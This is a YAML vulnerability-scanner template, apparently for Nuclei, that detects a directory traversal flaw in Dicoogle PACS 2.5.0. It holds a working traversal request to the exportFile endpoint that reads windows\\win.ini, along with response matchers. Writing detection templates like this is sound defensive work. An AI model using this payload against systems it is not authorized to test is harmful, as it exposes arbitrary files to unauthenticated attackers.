26 lines
771 B
YAML
26 lines
771 B
YAML
|
id: dicoogle-pacs-lfi
|
||
|
|
||
|
info:
|
||
|
name: Dicoogle PACS 2.5.0 - Directory Traversal
|
||
|
author: 0x_akoko
|
||
|
severity: high
|
||
|
description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
|
||
|
reference:
|
||
|
- https://cxsecurity.com/issue/WLB-2018070131
|
||
|
- http://www.dicoogle.com/home
|
||
|
tags: windows,lfi,dicoogle
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "bit app support"
|
||
|
- "fonts"
|
||
|
- "extensions"
|
||
|
condition: and
|